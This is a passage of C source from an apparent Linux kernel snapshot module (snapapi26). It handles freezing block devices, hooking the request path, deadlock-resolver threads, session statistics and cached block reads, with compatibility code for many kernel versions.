		if (tmp_s->s_request_queue && tmp_s != s &&
			s->s_bdev->bd_disk->fops == tmp_s->s_bdev->bd_disk->fops) {
#else
		if (tmp_s->s_request_queue == q && tmp_s != s) {
#endif
			s->s_make_request_fn = 0;
			s->s_request_queue = 0;
			s->s_queue_mq_based = 0;
			spin_unlock(&sessions_lock);
			sa_debug(DEBUG_API, "Keep queue as is. s=%p\n", s);
			return;
		}
	}
	spin_unlock(&sessions_lock);
#ifdef HAVE_QUEUE_LOCK_NPTR
	snapapi_lock_dev_queue(&q);
#else
	snapapi_lock_dev_queue(q);
#endif
#ifndef HAVE_BDOPS_SUBMIT_BIO
	q->make_request_fn = s->s_make_request_fn;
#else
	snapapi_set_submit_bio_fn(s->s_bdev, s->s_make_request_fn);
#endif
#ifdef HAVE_QUEUE_LOCK_NPTR
	snapapi_unlock_dev_queue(&q);
#else
	snapapi_unlock_dev_queue(q);
#endif
	s->s_make_request_fn = NULL;
	s->s_queue_mq_based = 0;
	s->s_request_queue = 0;
	sa_debug(DEBUG_API, "make_request deinstalled OK. s=%p\n", s);
	return;
}

static int do_resolver(void)
{
	struct session_struct *s;
	sa_debug(DEBUG_API, "\n");

	spin_lock(&sessions_lock);
	s = find_deadlocked();
	if (!s) {
		spin_unlock(&sessions_lock);
		return 0;
	}
	atomic_inc(&s->s_users);
	spin_unlock(&sessions_lock);

	sn_set_mb(s->s_state, SNAP_FREEZE_ERR);
	unregister_make_request(s);
	sa_info("Real cleanup started... s=%p(%x)", s, s->s_kdev);
	sn_thaw_bdev(s);
	cleanup_biolist(s);
	atomic_dec(&s->s_users);
	return 1;
}

#ifndef USE_KERNEL_THREAD
#ifndef HAVE_COMPLETE_AND_EXIT
#define complete_and_exit kthread_complete_and_exit
#endif /* complete_and_exit */
static int resolver_loop(void *flag)
{
	sa_debug(DEBUG_API, "\n");

	while (1) {
		snapapi_try_to_freeze();
		set_current_state(TASK_INTERRUPTIBLE);
		if (!resolver_thread_continue)
			break;

		schedule();
		if (resolver_thread_continue)
			while (do_resolver())
				;
		else
			break;
		if (signal_pending(current))
			flush_signals(current);
	}
	sa_debug(DEBUG_API, "exiting\n");
	complete_and_exit(&resolver_thread_exited, 0);
}
#else
static int resolver_loop(void *flag)
{
	sa_debug(DEBUG_API, "\n");
	lock_kernel();
	init_waitqueue_head(&resolver_thread_signal);
	daemonize("snapapid");
	allow_signal(SIGKILL);
	while (resolver_thread_continue) {
		interruptible_sleep_on_timeout(&resolver_thread_signal,
							MAX_SCHEDULE_TIMEOUT);
		if (resolver_thread_continue)
			do_resolver();
		else
			break;
		if (signal_pending(current))
			flush_signals(current);
	}
	unlock_kernel();
	sa_debug(DEBUG_API, "exiting\n");
	complete_and_exit(&resolver_thread_exited, 0);
}
#endif
#ifdef HAVE_INIT_TIMER
static void heartbeat_timer_func(unsigned long __data)
#else
static void heartbeat_timer_func(struct timer_list *t)
#endif
{
	struct session_struct *s;
	int ioctls;

#ifdef HAVE_INIT_TIMER
	s = (struct session_struct *) __data;
#else
	s =  from_timer(s, t, s_timer);
#endif
	ioctls = atomic_read(&s->s_pid_info->sn_ioctls);
	if (!s->s_heartbeat_active || ioctls != s->s_ioctlcnt_prev) {
		sa_debug(DEBUG_API, "s=%p(%x) %d %u %u %u\n", s, s->s_kdev,
			s->s_heartbeat_active,
			ioctls, s->s_ioctlcnt_prev, s->s_ioctlcnt);
		if (s->s_heartbeat_active)
			mod_timer(&s->s_timer, jiffies + TIMER_INTERVAL);
		s->s_ioctlcnt_prev = ioctls;
		return;
	}
	sa_info("Deadlock detected.dev=%x, cnt=%d, state=%d. Unfreezing...\n",
			s->s_kdev, ioctls, s->s_state);
	sn_set_mb(s->s_state, SNAP_DEADLOCK_ERR);
#ifndef USE_KERNEL_THREAD
	wake_up_process(resolver_thread);
#else
	wake_up_interruptible(&resolver_thread_signal);
#endif
}

static void sa_heartbeat_stop(struct session_struct *s)
{
	spin_lock_bh(&s->s_misc_lock);
	s->s_heartbeat_active = 0;
	spin_unlock_bh(&s->s_misc_lock);
	if (s->s_timer.function) {
		del_timer_sync(&s->s_timer);
		s->s_timer.function = NULL;
	}
}

static void sa_heartbeat_start(struct session_struct *s)
{
	spin_lock_bh(&s->s_misc_lock);
	s->s_heartbeat_active = 1;
	s->s_ioctlcnt_prev = atomic_read(&s->s_pid_info->sn_ioctls);
#ifdef HAVE_INIT_TIMER
	init_timer(&s->s_timer);
	s->s_timer.function = &heartbeat_timer_func;
	s->s_timer.data = (unsigned long) s;
#else
	timer_setup(&s->s_timer, heartbeat_timer_func, 0);
#endif
	s->s_timer.expires = jiffies + TIMER_INTERVAL;
	add_timer(&s->s_timer);
	spin_unlock_bh(&s->s_misc_lock);
}

static int validate_kernel_version(void)
{
#ifdef HAVE_BDOPS_SUBMIT_BIO
	if (strncmp(UTS_RELEASE, utsname()->release, strlen(UTS_RELEASE)) != 0)
		return 1;
#endif
	return 0;
}

static int session_freeze(struct session_struct *s)
{
	int ret;
	sn_request_queue *q;

	ret = -EINVAL;
	sa_debug(DEBUG_API, "s=%p(%x)\n", s, s->s_kdev);

#ifdef HAVE_BDOPS_SUBMIT_BIO
	if (validate_kernel_version() != 0) {
		printk(KERN_ERR "snapapi26 module was built for another kernel, have %s expecting %s. Exiting...", utsname()->release, UTS_RELEASE);
		return -ENXIO;
	}
#endif
	q = NULL;
	down(&s->s_sem);

	if (s->s_make_request_fn || s->s_queue_mq_based ||s->s_state != SNAP_INITED)
		goto out_up;
/* sync !!! */
	sn_freeze_bdev(s);
	if (!s->s_sb) {
		sa_debug(DEBUG_INTERNALS, "Can't find super, dev %x, freeze.\n", s->s_kdev);
#if 0
		sa_warn("Can't find super, device %x, freeze.\n", s->s_kdev);
		sn_set_mb(s->s_state, SNAP_FREEZE_ERR);
		ret = -ESRCH;
		goto out_up;
#endif
	}
	sn_set_mb(s->s_state, SNAP_FREEZING);
	if (register_make_request(s)) {
		sa_warn("Device %x does not have a queue.\n", s->s_kdev);
		sn_set_mb(s->s_state, SNAP_FREEZE_ERR);
		sn_thaw_bdev(s);
		goto out_up;
	}
/* The queue exists. It has been checked in register_make_request */
	q = snapapi_get_dev_queue(s);
	set_current_state(TASK_UNINTERRUPTIBLE);
#if defined (HAVE_REQUEST_QUEUE_RQS) || defined (HAVE_REQUEST_LIST_COUNT)
	do {
#ifdef HAVE_REQUEST_QUEUE_RQS
		const int rq_cnt = q->nr_rqs[WRITE];
#else
		const int rq_cnt = q->rq.count[WRITE];
#endif
		if (rq_cnt == 0)
			break;
		schedule_timeout(HZ / 20);
		sa_debug(DEBUG_INTERNALS, "count=%d, nr_requests=%lu\n",
			rq_cnt, q->nr_requests);
	} while (1);
#endif /* HAVE_REQUEST_QUEUE_RQS || HAVE_REQUEST_LIST_COUNT */
#ifdef HAVE_UNDERLINE_STATE
	current->__state = TASK_RUNNING;
#else
	current->state = TASK_RUNNING;
#endif
	sn_set_mb(s->s_state, SNAP_FROZEN);

	sa_heartbeat_start(s);
	ret = 0;

out_up:
	up(&s->s_sem);
	return ret;
}

static int session_unfreeze(struct session_struct *s)
{
	int ret;

	sa_debug(DEBUG_API, "s=%p(%x)\n", s, s->s_kdev);
	ret = -EINVAL;
	down(&s->s_sem);
	if (s->s_state != SNAP_FROZEN && s->s_state != SNAP_FREEZE_ERR)
		goto out_up;
	up(&s->s_sem);
	ret = 0;
	close_session(s, 0);
	return ret;

out_up:
	up(&s->s_sem);
	return ret;
}

static void session_stat(struct sn_state *sn)
{
	sa_warn("dev=%x:%x state=%d blksize=%d mmapsize=%d\n",
		sn->major, sn->minor, sn->state, sn->blksize, sn->mmapsize);
	sa_warn("psize=%llu pstrt=%llu mshft=%d ioctls=%u\n",
		sn->partsize, sn->partstrt, sn->minorshft, sn->ioctlcnt);
	sa_warn("bhpgs=%d bhcnt=%d abhs=%llu fbhs=%llu dbhs=%llu\n",
		sn->bhpages, sn->bhcount, sn->abhs, sn->fbhs, sn->dbhs);

	sa_warn("gpgs=%llu ppgs=%llu emmax=%d emmin=%d emcur=%d cached=%d\n",
		sn->gpages, sn->ppages, sn->emmax, sn->emmin, sn->emcur,
		sn->cachepages);

	sa_warn("rblk=%llu cblk=%llu rcblk=%llu rc2blk=%llu mcblk=%llu"
		" rwcolls=%llu\n", sn->rblocks, sn->cblocks,
		sn->rcblocks, sn->rc2blocks, sn->mcblocks, sn->rwcolls);

	sa_warn("sync=%u async=%u aretr=%u mipr=%u iprcnt=%u\n",
		sn->sync_req, sn->async_req, sn->async_retr,
		sn->mipr, sn->iprcnt);
	sa_warn("mbio=%u ioctlcnt=%u ioctlpid=%u\n",
		sn->mbio, sn->ioctlcnt, sn->ioctlpid);

	sa_warn("rccalls=%llu maxrcdepth=%llu rcdepthcnts=(%llu, %llu, %llu, %llu)\n",
		sn->rccalls, sn->maxrcdepth,
		sn->rcdepthcnt[0], sn->rcdepthcnt[1], sn->rcdepthcnt[2], sn->rcdepthcnt[3]);
	sa_warn("flags=%llu\n", sn->flags);
}

static void fill_state(struct session_struct *s, struct sn_state *out)
{
	out->state = s->s_state;
	out->major = MAJOR(s->s_kdev);
	out->minor = MINOR(s->s_kdev);
	out->blksize = s->s_bsize;
	out->mmapsize = s->s_maxmsize * PAGE_SIZE;

	out->partstrt = s->s_pstart;
	out->minorshft = 0;
	out->partsize = s->s_plen;

	out->bhpages = s->s_biopages;
	out->bhcount = s->s_biocount;
	out->emmax = snap_emergency_size;
	out->emmin = s->s_blkcache_emmin;
	out->emcur = s->s_blkcache_empages;
	out->cachepages = s->s_blkcache_pages;

	out->gpages = read_get_pages(s);
	out->ppages = read_put_pages(s);
	out->abhs = s->s_abios;
	out->fbhs = s->s_fbios;
	out->dbhs = s->s_dbios;
	out->rblocks = s->s_rblocks;
	out->cblocks = s->s_cblocks;
	out->rcblocks = s->s_rcblocks;
	out->fcblocks = s->s_fcblocks;
	out->mcblocks = s->s_mcblocks;
	out->rwcolls = s->s_rwcolls;
	out->rc2blocks = s->s_rc2blocks;
	out->sync_req = s->s_sync_req;
	out->mipr = s->s_mipr;
	out->async_req = s->s_async_req;
	out->iprcnt = s->s_iprcnt;
	out->async_retr = s->s_async_retr;
	out->mbio = s->s_mbio;
	out->ioctlcnt = s->s_ioctlcnt;
	out->ioctlpid = s->s_pid_info ? atomic_read(&s->s_pid_info->sn_ioctls) : 0;
	out->version =  (SNAPAPI_VMAJOR << 16) + (SNAPAPI_VMINOR << 8) +
							SNAPAPI_VSUBMINOR;

	out->extrasize = sizeof(struct sn_state) - offsetof(struct sn_state, extrasize);
	out->rccalls = s->s_rccalls;
	out->maxrcdepth = s->s_maxrcdepth;
	out->rcdepthcnt[0] = s->s_rcdepthcnt[0];
	out->rcdepthcnt[1] = s->s_rcdepthcnt[1];
	out->rcdepthcnt[2] = s->s_rcdepthcnt[2];
	out->rcdepthcnt[3] = s->s_rcdepthcnt[3];
	out->flags = 0;
	if (validate_kernel_version() != 0)
	  out->flags |= KERNEL_NOT_MATCHED;
}

static int session_state(struct session_struct *s, struct sn_state *state,
						unsigned int size)
{
	int ret;
	struct sn_state out;

	sa_debug(DEBUG_API, "s=%p, state=%p\n", s, state);
	fill_state(s, &out);
	if (size > sizeof(out))
		size = sizeof(out);
	ret = copy_to_user(state, &out, size);
	if (ret)
		return -EACCES;
	return 0;
}

#if 0
static void dump_sessions(void)
{
	struct session_struct *s;
	sa_warn("Start sessions dump\n");
	list_for_each_entry(s, &sessions_list, s_list) {
		sa_warn("dev=%x:%x state=%u blksize=%u mmapsize=%d queue=%p\n",
			MAJOR(s->s_kdev), MINOR(s->s_kdev), s->s_state,
			s->s_bsize,  (int)(s->s_maxmsize * PAGE_SIZE),
			s->s_request_queue);
		sa_warn("psize=%llu pstrt=%llu mshft=%d ioctls=%d\n",
			s->s_plen, s->s_pstart, 0, s->s_ioctlcnt);
		sa_warn("bhpgs=%d bhcnt=%d abhs=%llu fbhs=%llu dbhs=%llu\n",
			s->s_biopages, s->s_biocount, s->s_abios, s->s_fbios,
			s->s_dbios);
		sa_warn("gpgs=%llu ppgs=%llu emmax=%d emmin=%d emcur=%d"
			" cached=%d\n", read_get_pages(s), read_get_pages(s),
			snap_emergency_size, s->s_blkcache_emmin,
			s->s_blkcache_empages, s->s_blkcache_pages);
		sa_warn("rblk=%llu cblk=%llu rcblk=%llu rc2blk=%llu mcblk=%llu"
			" rwcolls=%llu\n", s->s_rblocks, s->s_cblocks,
			s->s_rcblocks, s->s_rc2blocks, s->s_mcblocks,
			s->s_rwcolls);
	}
	sa_warn("End of sessions dump\n");
}
#endif

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,15)
#define _READS ios[0]
#define _WRITES ios[1]
#define _READ_SECTORS sectors[0]
#define _WRITE_SECTORS sectors[1]
#else
#define _READS reads
#define _WRITES writes
#define _READ_SECTORS read_sectors
#define _WRITE_SECTORS write_sectors
#endif

#ifdef HAVE_BDEV_FILE_OPEN_BY_DEV

#define USE_BDEV_FILE

#elif defined(HAVE_BDEV_OPEN_BY_DEV)

#define USE_BDEV_HANDLE

#elif defined(HAVE_BLKDEV_GET_BY_DEV)

#ifdef HAVE_BLKDEV_GET_BY_DEV_USE_FMODE
#define USE_BDEV_BLOCK_DEV_FMODE
#else
#define USE_BDEV_BLOCK_DEV_BLK_MODE
#endif

#else

#define USE_BDGET

#endif

#ifdef USE_BDEV_FILE
/* kernel 6.9.x */
#define BLKDEV_GET_MODE_EXCL BLK_OPEN_READ | BLK_OPEN_WRITE
#define BLKDEV_GET_MODE_SHARED BLK_OPEN_READ

static struct block_device *sn_blkdev_get_by_dev(dev_t kdev, fmode_t mode, void *holder, void** container)
{
	struct block_device *bdev;

	sa_debug(DEBUG_API, "Start kdev=%x mode=%d holder=%p container=%p\n", kdev, (int) mode, holder, container);
	struct file *fp = bdev_file_open_by_dev(kdev, mode, holder, NULL);
	if (IS_ERR(fp)) {
		return NULL;
	}
	bdev = file_bdev(fp);
	*container = fp;
	sa_debug(DEBUG_API, "OK kdev=%x bdev=%p\n", kdev, bdev);
	return bdev;
}

static void sn_blkdev_put_by_dev(struct block_device* bdev, fmode_t mode, void* holder, void* container)
{
	sa_debug(DEBUG_API, "Start bdev=%p mode=%d holder=%p container=%p\n", bdev, (int) mode, holder, container);
	fput((struct file*) container);
}
#endif

#ifdef USE_BDEV_HANDLE
/* kernel 6.6-6.8 */
#define BLKDEV_GET_MODE_EXCL BLK_OPEN_READ | BLK_OPEN_WRITE
#define BLKDEV_GET_MODE_SHARED BLK_OPEN_READ

static struct block_device *sn_blkdev_get_by_dev(dev_t kdev, fmode_t mode, void *holder, void** container)
{
	struct block_device *bdev;

	sa_debug(DEBUG_API, "Start kdev=%x mode=%d holder=%p container=%p\n", kdev, (int) mode, holder, container);
	struct bdev_handle *handle = bdev_open_by_dev(kdev, mode, holder, NULL);
	if (IS_ERR(handle)) {
		return NULL;
	}
	bdev = handle->bdev;
	*container = handle;
	sa_debug(DEBUG_API, "OK kdev=%x bdev=%p\n", kdev, bdev);
	return bdev;
}

static void sn_blkdev_put_by_dev(struct block_device* bdev, fmode_t mode, void* holder, void* container)
{
	sa_debug(DEBUG_API, "Start bdev=%p mode=%d holder=%p container=%p\n", bdev, (int) mode, holder, container);
	bdev_release((struct bdev_handle *)container);
}
#endif

#ifdef USE_BDEV_BLOCK_DEV_BLK_MODE
/* kernel 6.5 */
#define BLKDEV_GET_MODE_EXCL BLK_OPEN_READ | BLK_OPEN_WRITE
#define BLKDEV_GET_MODE_SHARED BLK_OPEN_READ

static struct block_device *sn_blkdev_get_by_dev(dev_t kdev, fmode_t mode, void *holder, void** container)
{
	struct block_device *bdev;

	sa_debug(DEBUG_API, "Start kdev=%x mode=%d holder=%p container=%p\n", kdev, (int) mode, holder, container);
	bdev = blkdev_get_by_dev(kdev, mode, holder, NULL);
	if (IS_ERR(bdev)) {
		return NULL;
	}
	sa_debug(DEBUG_API, "OK kdev=%x bdev=%p\n", kdev, bdev);
	return bdev;
}

static void sn_blkdev_put_by_dev(struct block_device* bdev, fmode_t mode, void* holder, void* container)
{
	sa_debug(DEBUG_API, "Start bdev=%p mode=%d holder=%p container=%p\n", bdev, (int) mode, holder, container);
	blkdev_put(bdev, holder);
}
#endif

#ifdef USE_BDEV_BLOCK_DEV_FMODE
/* kernel 3.19-6.4 */
#define BLKDEV_GET_MODE_EXCL FMODE_READ | FMODE_WRITE | FMODE_EXCL
#define BLKDEV_GET_MODE_SHARED FMODE_READ

static struct block_device *sn_blkdev_get_by_dev(dev_t kdev, fmode_t mode, void *holder, void** container)
{
	struct block_device *bdev;

	sa_debug(DEBUG_API, "Start kdev=%x mode=%d holder=%p container=%p\n", kdev, (int) mode, holder, container);
	bdev = blkdev_get_by_dev(kdev, mode, holder);
	if (IS_ERR(bdev)) {
		return NULL;
	}
	sa_debug(DEBUG_API, "OK kdev=%x bdev=%p\n", kdev, bdev);
	return bdev;
}

static void sn_blkdev_put_by_dev(struct block_device* bdev, fmode_t mode, void* holder, void* container)
{
	sa_debug(DEBUG_API, "Start bdev=%p mode=%d holder=%p container=%p\n", bdev, (int) mode, holder, container);
#ifdef HAVE_BLKDEV_GET_BY_DEV_HOLDER
	blkdev_put(bdev, holder);
#else
	blkdev_put(bdev, mode);
#endif
}
#endif

#ifdef USE_BDGET
#ifndef FMODE_EXCL
#define FMODE_EXCL 0
#endif
#define BLKDEV_GET_MODE_EXCL FMODE_READ | FMODE_WRITE | FMODE_EXCL
#define BLKDEV_GET_MODE_SHARED FMODE_READ

static int sn_blkdev_get(struct block_device *bdev, fmode_t mode, void *holder)
{
#ifdef HAVE_BLKDEV_GET_3ARG_FLAG
	return blkdev_get(bdev, mode, (unsigned)holder); /* up to 2.6.28 kernels */
#elif defined(HAVE_BLKDEV_GET_3ARGS)
	return blkdev_get(bdev, mode, holder); /* since 2.6.38 kernels */
#else
	return blkdev_get(bdev, mode); /* ~2.6.28 to 2.6.37 kernels */
#endif
}

static MAKE_BLKDEV_RETURN_VALUE sn_blkdev_put(struct block_device *bdev, fmode_t mode, void *holder)
{
#ifdef HAVE_BLKDEV_PUT_2ARGS
#ifdef HAVE_BLKDEV_PUT_HOLDER
	return blkdev_put(bdev, holder);
#else
	return blkdev_put(bdev, mode);
#endif /* HAVE_BLKDEV_PUT_HOLDER */
#else  /* HAVE_BLKDEV_PUT_2ARGS */
	return blkdev_put(bdev);
#endif /* HAVE_BLKDEV_PUT_2ARGS */
}

static struct block_device *sn_blkdev_get_by_dev(dev_t kdev, fmode_t mode, void *holder, void **container)
{
	struct block_device *bdev;
	sa_debug(DEBUG_API, "Start kdev=%x mode=%d holder=%p\n", kdev, (int) mode, holder);
	int ret;
	bdev = bdget(kdev);
	if (!bdev)
		return NULL;
	if ((ret = sn_blkdev_get(bdev, mode, holder)) < 0)
		return NULL;
	sa_debug(DEBUG_API, "bd_part=%p bd_contains=%p\n", bdev->bd_part,
			bdev->bd_contains);
	sa_debug(DEBUG_API, "OK kdev=%x bdev=%p\n", kdev, bdev);
	return bdev;
}


static void sn_blkdev_put_by_dev(struct block_device * bdev, fmode_t mode, void* holder, void *container)
{
	sa_debug(DEBUG_API, "Start bdev=%p mode=%d holder=%p\n", bdev, (int) mode, holder);
	sn_blkdev_put(bdev, mode, holder);
}

#endif /* HAVE_BDGET */

static int session_devinfo(struct session_struct *s, dev_t kdev,
				struct sn_devinfo *info, unsigned int size)
{
	int ret;
	struct sn_devinfo out;
	struct super_block * sb;
	struct block_device *bdev;
	void *bdev_container;

	sa_debug(DEBUG_API, "s=%p, devinfo=%p\n", s, info);
	bdev_container = 0;
	memset(&out, 0,sizeof(out));
	out.major = MAJOR(kdev);
	out.minor = MINOR(kdev);
	/* sharing mode - can use 0 as holder */
	bdev = sn_blkdev_get_by_dev(kdev, BLKDEV_GET_MODE_SHARED, NULL, &bdev_container);
	if (!bdev)
		return -ENODEV;
	out.partstrt = get_start_sect(bdev);
#ifdef HAVE_BDEV_IS_PARTITION
	if (bdev_is_partition(bdev)) {
#else
	if (bdev->bd_part) {
#endif
#ifdef HAVE_BDEV_NR_SECTORS
		out.partsize = bdev_nr_sectors(bdev);
#else
		out.partsize = bdev->bd_part->nr_sects;
#endif
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,25)
#ifndef HAVE_BD_PART
		out.reads = part_stat_read(bdev, _READS);
		out.read_sectors = part_stat_read(bdev, _READ_SECTORS);
		out.writes = part_stat_read(bdev, _WRITES);
		out.write_sectors = part_stat_read(bdev, _WRITE_SECTORS);
#else
		out.reads = part_stat_read(bdev->bd_part, _READS);
		out.read_sectors = part_stat_read(bdev->bd_part, _READ_SECTORS);
		out.writes = part_stat_read(bdev->bd_part, _WRITES);
		out.write_sectors = part_stat_read(bdev->bd_part, _WRITE_SECTORS);
#endif /*HAVE_BD_PART*/
#else
		out.reads = bdev->bd_part->_READS;
		out.read_sectors = bdev->bd_part->_READ_SECTORS;
		out.writes = bdev->bd_part->_WRITES;
		out.write_sectors = bdev->bd_part->_WRITE_SECTORS;
#endif
	} else if (bdev->bd_disk) {
		out.partsize = get_capacity(bdev->bd_disk);
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,28)
		out.reads = disk_stat_read(bdev->bd_disk, _READS);
		out.read_sectors = disk_stat_read(bdev->bd_disk, _READ_SECTORS);
		out.writes = disk_stat_read(bdev->bd_disk, _WRITES);
		out.write_sectors = disk_stat_read(bdev->bd_disk, _WRITE_SECTORS);
#else
#ifndef HAVE_BD_PART
		out.reads = part_stat_read(bdev, _READS);
		out.read_sectors = part_stat_read(bdev, _READ_SECTORS);
		out.writes = part_stat_read(bdev, _WRITES);
		out.write_sectors = part_stat_read(bdev, _WRITE_SECTORS);
#else
		out.reads = part_stat_read(&bdev->bd_disk->part0, _READS);
		out.read_sectors = part_stat_read(&bdev->bd_disk->part0, _READ_SECTORS);
		out.writes = part_stat_read(&bdev->bd_disk->part0, _WRITES);
		out.write_sectors = part_stat_read(&bdev->bd_disk->part0, _WRITE_SECTORS);
#endif /*HAVE_BD_PART*/
#endif
	}
	else
		sa_warn("Can't detect device %x size.\n", kdev);
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,15)
	sb = sn_get_super(bdev);
#else
	sb = user_get_super(kdev);
#endif
	sn_blkdev_put_by_dev(bdev, FMODE_READ, NULL, bdev_container);
	if (sb) {
		out.blksize = sb->s_blocksize;
		sn_drop_super(sb);
	}
	if (size > sizeof(out))
		size = sizeof(out);
	ret = copy_to_user(info, &out, size);
	if (ret)
		return -EACCES;
	return 0;
}

static int session_getbno(struct session_struct *s, unsigned long long *data)
{
	unsigned long long bno;
	int err;

	if (!s->s_blkmap.blkmap || s->s_state != SNAP_MAPPED) {
		sa_warn("session_getbno failed. state=%d\n", s->s_state);
		return -EINVAL;
	}
	down(&s->s_sem);
	bno = any_block_in_cache(s);
	up(&s->s_sem);
	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu\n", s, bno);
	err = put_user(bno, data);
	if (err)
		sa_warn("session_getbno failed. err=%d\n", err);

	return err;
}

static int session_rdcache(struct session_struct *s, struct sn_rdcache *req,
						unsigned int size)
{
	int ret;
	struct sn_rdcache rdc;
	struct page * page;
	unsigned int max_blocks;
	char *data;
	unsigned long long bno;
	unsigned int i;

	sa_debug(DEBUG_API, "s=%p, req=%p\n", s, req);
	if (!s->s_blkmap.blkmap || s->s_state != SNAP_MAPPED)
		return -EINVAL;
	page = alloc_page(GFP_KERNEL);
	if (!page)
		return -ENOMEM;
	memset(&rdc, 0, sizeof(rdc));
	if (size > sizeof(rdc))
		size = sizeof(rdc);
	ret = copy_from_user(&rdc, req, size);
	if (ret || rdc.buf == 0 || rdc.size == 0) {
		page_cache_release(page);
		return  -EACCES;
	}
	down(&s->s_sem);
	rdc.bno = any_block_in_cache(s);
	if (rdc.bno == ~0ULL)
		goto out_up;
	max_blocks = rdc.size / s->s_bsize;
	data = rdc.buf;
	bno = rdc.bno;
	for (i = 0; i < max_blocks; i++, bno++, data += s->s_bsize) {
		ret = sa_cache_read(s, page_address(page), bno,
				READ_KERNEL1, SNAP_READ_ONCE);
		if (!ret)
			break;
		ret = copy_to_user(data, page_address(page), s->s_bsize);
		if (ret) {
			ret = -EACCES;
			break;
		}
		s->s_rc2blocks++;
	}
	rdc.count = bno - rdc.bno;
out_up:
	up(&s->s_sem);
	page_cache_release(page);
	if (ret)
		return ret;
	ret = copy_to_user(req, &rdc, size);
	if (ret)
		return -EACCES;
	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu count=%u\n", s, rdc.bno, rdc.count);
	return 0;
}

static int session_bfree(struct session_struct *s, unsigned long long bno,
				unsigned long long count)
{
	int ret;
	unsigned long long end;

	ret = -EINVAL;
	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu, count=%llu\n", s, bno, count);
	down(&s->s_sem);
	if (!s->s_blkmap.blkmap)
		goto out;
	end = bno + count;
	if (end < bno || end > s->s_blkmap.size)
		goto out;
	if (s->s_state != SNAP_MAPPED)
		goto out;

	for (; count; bno++, count--) {
		if (clear_block_in_map(&s->s_blkmap, bno) == 0)
			sa_cache_read(s, NULL, bno, FAKE_READ, SNAP_READ_ONCE);
 	}
	ret = 0;

out:
	up(&s->s_sem);
	return ret;
}

static inline char * bread_data_addr(struct session_struct *s, int i)
{
	if (s->s_bppage == 1)
		return page_address(s->s_mpages[i]);
	return ((char *)page_address(s->s_mpages[i / s->s_bppage]) +
			(i % s->s_bppage) * s->s_bsize);
}

static void bread_submit_bios(struct session_struct *s,
		unsigned long long bno, int count)
{
	struct bio *bio;
	struct page *page;
	int i, k;
	int vecs, page_idx, last_len;

	i = 0;
	page_idx = 0;
	last_len = count % s->s_bppage;
	s->s_rblocks += count;

	while (count > 0) {
repeate:
		vecs = sn_round(count, s->s_bppage);
#ifndef HAVE_BIO_ALLOC_2ARGS
		bio = bio_alloc(s->s_bdev, vecs, 0, GFP_NOIO);
#else
		bio = bio_alloc(GFP_NOIO, vecs);
#endif
		if (!bio) {
			schedule();
			goto repeate;
		}
		s->s_abios++;
#ifdef HAVE_BIO_ALLOC_2ARGS
#ifndef HAVE_BIO_SET_DEV
		bio->bi_bdev = s->s_bdev;
#else
		bio_set_dev(bio,s->s_bdev);
#endif
#endif

#ifdef HAVE_BVEC_ITER
		bio->bi_iter.bi_sector = ((sector_t) bno) * s->s_spb;
#else
		bio->bi_sector = ((sector_t) bno) * s->s_spb;
#endif
		init_completion(&s->s_local_bios[i].event);
		bio->bi_private = &s->s_local_bios[i].event;
		bio->bi_end_io = sa_cache_bio_end_io;

		for (k = 0; k < vecs; k++) {
			int vec_len = PAGE_SIZE;
			page = s->s_mpages[page_idx];
			if (count == last_len)
				vec_len = last_len * s->s_bsize;
			if (bio_add_page(bio, page, vec_len , 0) < vec_len)
				break;
			count -= vec_len / s->s_bsize;
			page_idx++;
		}
		s->s_local_bios[i].bio = bio;
		bno += sn_bio_bi_size(bio) / s->s_bsize;
		sn_submit_bio(READ, bio);
		i++;
	}
}

static int bread_from_cache(struct session_struct *s, unsigned long long bno,
		unsigned int count, unsigned int flags)
{
	int i, numread, ret;

	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu, count=%u\n",
					s, bno, count);
	numread = 0;
	for (i = 0; i < count; i++, bno++) {
		char * data;

		data = bread_data_addr(s, i);
		ret = sa_cache_read(s, data, bno, READ_KERNEL1, flags);
		if (ret)
			numread++;
	}
	return numread;
}

static int bread_wait_submitted(struct session_struct *s,
				unsigned long long bno, unsigned int count)
{
	int i, ret;
	int reqs;

	ret = 0;
	reqs = s->s_msize;
	for (i = 0; i < reqs; i++) {
		if (!s->s_local_bios[i].bio)
			continue;
		wait_for_completion(&s->s_local_bios[i].event);
		if (sn_is_error_bio(s->s_local_bios[i].bio))
			ret = -EIO;
	}
	return ret;
}

#if 0
static inline void dump_data(void *data, int offset, char *pref)
{
	unsigned char *p = (unsigned char *)data + offset;
	sa_debug(DEBUG_BREAD, "%s %x:%x %x %x %x %x %x %x %x %x %x %x %x %x"
		" %x %x %x\n",
		pref, offset,
		*p, *(p+1), *(p+2), *(p+3), *(p+4), *(p+5), *(p+6), *(p+7),
		*(p+8), *(p+9), *(p+10), *(p+11), *(p+12), *(p+13), *(p+14),
		*(p+15));
}
#endif
static int session_bread_fast(struct session_struct *s, unsigned long long bno,
			unsigned int count, unsigned int flags,
			unsigned long long *bincache)
{
	int ret, ccnt, i;
	unsigned long long cachecnt;
	unsigned int rcount;	/* saved count */
	unsigned int reqs;

	ret = ccnt = 0;
	rcount = count;

	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu, count=%u\n",
					s, bno, count);
	if (bno + count > (s->s_plen >> s->s_spbshift))
		count = (s->s_plen >> s->s_spbshift) - bno;
	bread_submit_bios(s, bno, count);
	ret = bread_wait_submitted(s, bno, count);
	if (!ret) /* read from cache only requested blocks */ {
		if (flags & SNAP_READ_ONCE)
			for (i = 0; i < rcount; i++)
				clear_block_in_map(&s->s_blkmap, bno + i);
		ccnt = bread_from_cache(s, bno, rcount, flags);
	}
	reqs = s->s_msize;
	for (i = 0; i < reqs; i++) {
		if (s->s_local_bios[i].bio) {
			bio_put(s->s_local_bios[i].bio);
			s->s_local_bios[i].bio = NULL;
			s->s_fbios++;
		}
	}
	cachecnt = 0;
	if (!(flags & SNAP_READ_ONCE))
		/* wakeup user level cache in none SNAP_READ_ONCE mode only */
		cachecnt = s->s_cblocks - s->s_fcblocks;
	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu, L=%u, R=%d, C=%d\n",
					s, bno, count, rcount, ccnt);
	sa_debug(DEBUG_CACHE, "cached=%llu, read=%llu, incache=%llu\n",
